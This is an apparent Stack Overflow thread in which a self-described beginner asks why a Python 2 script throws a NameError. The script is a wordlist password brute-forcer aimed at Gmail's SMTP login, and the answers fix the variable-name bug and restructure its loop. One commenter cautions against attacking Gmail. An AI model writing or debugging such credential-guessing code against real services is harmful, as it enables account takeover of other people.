# PYTHON 2.7.9: NameError: name '___' is not defined

Tags: python, dictionary-attack

I'm new to programming, but I'm trying to create the following script. Can you show me what I'm doing wrong?

```
import smtplib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

user = raw_input("Enter the target's email address: ")
Passwfile = raw_input("Enter the password file name: ")
Passwfile = open(passwfile, "r")

for password in passwfile:
        try:
                smtpserver.login(user, password)
                print "[+] Password Found: %s" % password
                break;
        except smtplib.SMTPAuthenticationError:
                print "[!] Password Incorrect: %s" % password
```

When I add my wordlist.lst file, an error message comes up in my terminal saying the following:

```
File "gmail.py", line 9, in <module>
Passwfile = open(passwfile, "r"
NameError: name 'passwfile' is not defined
```

Can any experts give me some advice please?
I'm using Python 2.7.9 on Kali Linux (Python 2 was pre-installed, so I just decided to learn it instead of try Python 3.)

Comment: Because it is case sensitive Passwfile != passwfile, and don't put a break into try statement, you must also read the file's content with `f.read();`

Comment: By the way this script looks like a brute force hacking script for gmail accounts :D

Comment: I'm new to hacking and I'm trying to hack into my own account for the mere purpose of learning how.

Comment: @RustyFlick: Yeah, that's a bad idea. Stick exclusively to systems you control or systems specifically set up for the purpose; Gmail doesn't fall under one of those categories, even if it's your own account you're targeting.

Comment: Yeah, you're right. I think I should learn it now, and wait until I control/have permission over a system

Answer (score 3, accepted):

There is no variable named `passwfile` defined. There is, however, one named `Passwfile` (note the capitalisation) which is the one that you should use because identifiers are case sensitive in Python.

Note that in Python the convention is to use all lower-case for variable names. Captialised identifiers are normally used for class names. So your code could read:

```
user = raw_input("Enter the target's email address: ")
password_filename = raw_input("Enter the password file name: ")
password_file = open(password_filename, "r")

for password in password_file:
```

for example.

For further information about identifiers and other issues of style refer to [PEP 8](https://www.python.org/dev/peps/pep-0008/#method-names-and-instance-variables). Here it recommends that variables be underscore separated lowercase words, so prefer `password_file` over `passwfile` for example.

Another useful tip is to open files within a context manager by using the `with` statement:

```
user = raw_input("Enter the target's email address: ")
password_filename = raw_input("Enter the password file name: ")

with open(password_filename) as password_file:
    for password in password_file:
        # nasty stuff here
```

The context manager will ensure that the file is always closed properly if, for example, there is an unhandled exception.

Finally, use this for good, not evil :)

Comment: Thank you guys so much, I will try this solution. And thanks for explaining it to me!! :) I want to learn it, not just copy/paste.

Comment: I will try this new solution now. Also, you said "use this for good, not evil" I'll note that I am new to hacking and I'm only hacking into my OWN email account for the mere purpose of learning how, no more than that. :)

Comment: @C1sc0: you can iterate over the lines in a file within a for loop using the file handle as shown. That should not be a problem.

Comment: Although it is no longer capitalized, here is the error I receive:  File "gmail.py", line 9, in <module>
    Passwfile = open(passwfile, "r")
NameError: name 'passwfile' is not defined

Comment: The error still indicates that `passwfile` is not defined. You are still using `Passwfile` as the name for the file handle, so presumably you are still using it for the name of the file entered by the user.

Comment: I replaced it though, just as C1sc0 said. So, I copied the script, moved file to trash, and in a terminal typed "pico gmail.py" , made the file executable. and now the new code wont even run?

Comment: I predict a short hacking career for you :)

Comment: Why is that? I'm only about 3 days into hacking. I'm just trying to learn.

Answer (score 0):

check the line

```
Passwfile = raw_input("Enter the password file name: ")
```

Here you are storing `raw_input` in a variable Passwfile (P in upper case)